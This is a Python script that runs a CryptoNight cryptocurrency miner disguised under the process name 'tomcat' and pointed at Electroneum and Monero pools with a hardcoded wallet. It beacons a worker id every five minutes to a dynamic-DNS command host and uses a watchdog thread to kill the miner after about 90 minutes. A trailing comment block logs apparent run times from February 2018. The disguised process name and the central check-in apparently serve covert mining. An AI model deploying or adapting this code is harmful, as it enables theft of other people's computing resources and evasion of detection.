import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:07.492854
#2018-02-17 17:29:04.125405
#2018-02-17 19:17:06.806149
#2018-02-17 21:07:07.561399
#2018-02-17 22:51:07.608660
#2018-02-18 00:36:02.124119
#2018-02-18 02:26:05.585151
#2018-02-18 04:13:01.774171
#2018-02-18 06:03:04.371033
#2018-02-18 07:52:06.077467
#2018-02-18 09:41:07.098850
#2018-02-18 11:28:03.519019
#2018-02-18 13:15:07.524015
#2018-02-18 15:06:07.634426
#2018-02-18 16:53:04.335040
#2018-02-18 18:41:07.514927
#2018-02-18 20:28:05.662059
#2018-02-18 22:14:03.794839
#2018-02-19 00:02:04.202796
#2018-02-19 01:47:01.335886
#2018-02-19 03:37:07.521239
#2018-02-19 05:22:03.680124
#2018-02-19 07:09:05.556115
#2018-02-19 08:58:06.900581
#2018-02-19 10:46:01.779872
#2018-02-19 12:33:02.202183
#2018-02-19 14:19:06.841917
#2018-02-19 16:07:05.171780
#2018-02-19 17:54:08.619338
#2018-02-19 19:42:09.006440
#2018-02-19 21:29:07.504728
#2018-02-19 23:15:03.499813
#2018-02-20 00:59:04.404354
#2018-02-20 02:49:05.784141
#2018-02-20 04:37:05.151005
#2018-02-20 06:20:08.291799
#2018-02-20 08:05:08.831001
#2018-02-20 09:51:01.835001
#2018-02-20 11:34:07.220249
#2018-02-20 13:22:05.065196
#2018-02-20 15:07:01.460144
#2018-02-20 16:51:08.706432
#2018-02-20 18:39:07.161782
#2018-02-20 20:29:06.438159
#2018-02-20 22:15:01.753567
#2018-02-20 23:56:04.033629
#2018-02-21 01:41:07.667167
#2018-02-21 03:29:01.445007
#2018-02-21 05:16:07.625881
#2018-02-21 07:04:04.688470
#2018-02-21 08:49:03.473177
#2018-02-21 10:37:02.159782
#2018-02-21 12:24:07.225751
#2018-02-21 14:10:02.210676
#2018-02-21 15:55:08.420509
#2018-02-21 17:48:06.809442
#2018-02-21 19:33:06.106712
#2018-02-21 21:20:06.948904
#2018-02-21 23:06:06.593493
#2018-02-22 00:54:05.471685
#2018-02-22 02:41:07.351473
#2018-02-22 04:26:08.520358
#2018-02-22 06:12:08.738448
#2018-02-22 07:58:02.213780
#2018-02-22 09:46:04.897119
#2018-02-22 11:31:06.129432
#2018-02-22 13:17:05.985879
#2018-02-22 15:06:01.440082
#2018-02-22 16:49:07.677833
#2018-02-22 18:37:05.968263
#2018-02-22 20:27:05.087402
#2018-02-22 22:13:01.492624
#2018-02-22 23:59:03.760462
#2018-02-23 01:48:08.614668
#2018-02-23 03:32:08.554107
#2018-02-23 05:17:07.486145
#2018-02-23 07:04:05.024159
#2018-02-23 08:52:07.490984
#2018-02-23 11:08:07.857581
#2018-02-23 13:02:02.016858
#2018-02-23 14:46:05.112195
#2018-02-23 16:34:09.050864
#2018-02-23 18:20:06.549920
#2018-02-23 20:06:07.163513
#2018-02-23 21:51:08.155404
#2018-02-23 23:42:04.738903
#2018-02-24 01:33:01.784842
#2018-02-24 03:22:05.601870
#2018-02-24 05:07:04.306062
#2018-02-24 06:56:03.226243
#2018-02-24 08:46:04.836263
#2018-02-24 10:47:05.080560
#2018-02-24 12:34:07.010408
#2018-02-24 14:23:06.389102
#2018-02-24 16:11:08.335620
#2018-02-24 18:03:06.124534
#2018-02-24 19:50:05.584195
#2018-02-24 21:34:06.405143
#2018-02-25 00:21:06.961684
#2018-02-25 04:18:07.287094
#2018-02-25 07:49:01.224234